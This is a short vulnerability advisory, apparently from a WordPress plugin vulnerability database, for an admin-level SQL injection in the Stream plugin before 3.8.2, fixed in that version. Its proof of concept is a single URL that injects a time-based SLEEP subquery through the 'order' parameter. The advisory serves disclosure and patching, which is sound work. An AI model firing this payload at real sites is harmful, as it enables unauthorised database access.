WordPress Plugin Vulnerabilities

Stream < 3.8.2 - Admin+ SQL Injection

Description

The plugin does not sanitise and validate the order GET parameter from the Stream Records admin dashboard before using it in a SQL statement, leading to an SQL injection issue.

Proof of Concept

https://example.com/wp-admin/admin.php?page=wp_stream&order=+AND+(SELECT+9940+FROM+(SELECT(SLEEP(5)))vqNl)

Affects Plugins

Fixed in 3.8.2

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
bl4derunner
Submitter
Anton Sarsadskikh
Verified
Yes

Timeline

Publicly Published
2021-10-18 (about 2 years ago)
Added
2021-10-18 (about 2 years ago)
Last Updated
2022-04-14 (about 2 years ago)

Other